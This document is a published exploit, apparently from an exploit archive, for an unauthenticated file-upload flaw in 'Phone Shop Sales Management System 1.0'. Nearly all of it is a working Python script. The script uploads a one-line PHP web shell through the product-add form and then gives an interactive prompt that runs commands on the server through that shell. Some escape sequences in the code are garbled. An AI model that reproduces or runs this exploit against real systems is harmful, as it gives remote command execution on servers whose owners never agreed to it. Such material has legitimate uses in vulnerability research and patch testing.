Authored by Richard Jones

Phone Shop Sales Management System version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)
# Date: 20/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

import requests
import sys

IP="127.0.0.1" # CHANGE ME

ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php"
CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"
s = requests.Session()

def postShell():

    data = {
        "ProductName":"1",
        "BrandName":"1",
        "ProductPrice":1,
        "Quantity":"1",
        "TotalPrice":1,
        "DisplaySize":"1",
        "OperatingSystem":"1",
        "Processor":"1",
        "InternalMemory":"1",
        "RAM":"1",
        "CameraDescription":"1",
        "BatteryLife":"1",
        "Weight":"1",
        "Model":"1",
        "Dimension":"1",
        "date2":"1",
        "Description":"1",
        "_wysihtml5_mode":"1",
       }


    fileData = {
        'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")}

    r = s.post(ADDURL, files=fileData, data=data)

    if "The product is successfully added" in r.text:
        return True
    else:
        return False

def runWebShell():
    try:
        while True:
            cmd=input("33[32;1m" +"$: "+ "33[0m")
            if cmd == "exit":
                sys.exit()
            r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)
            if r.status_code == 200:
                print(r.text)
            else:
                raise Exception("Cmd error")
    except KeyboardInterrupt():
        sys.exit()

def banner():
    ban = r"""__________.__                             _________.__                      _________      .__                     _____         _________    
______     |__   ____   ____   ____    /   _____/|  |__   ____ ______    /   _____/____  |  |   ____   ______   /            /   _____/    
 |     ___/  |   /  _  /    _/ __    _____   |  |   /  _ ____    _____  __   |  | _/ __  /  ___/  /   /        _____       
 |    |   |   Y  (  <_> )   |    ___/   /        |   Y  (  <_> )  |_> >  /        / __ |  |_  ___/ ___   /    Y         /            
 |____|   |___|  /____/|___|  /___  > /_______  /|___|  /____/|   __/  /_______  (____  /____/___  >____  > ____|__  / / /_______  / / 
               /            /     /          /      /       |__|             /     /          /     /          /  /         /  / """

    return ban

def main():
    print("33[34;1m" + banner() + "33[0m")
    print("33[32;1m" + "Created by Richard Jones 20/04/2021"+ "33[0m" + "n")
    print("33[72;1m" +"[+] Sending WebShell..."+ "33[0m")
    if postShell():
        print("33[72;1m" +"[+] Calling WebShell..."+ "33[0m")
        runWebShell()

if __name__ == "__main__":
    main()

RELATED ARTICLESMORE FROM AUTHOR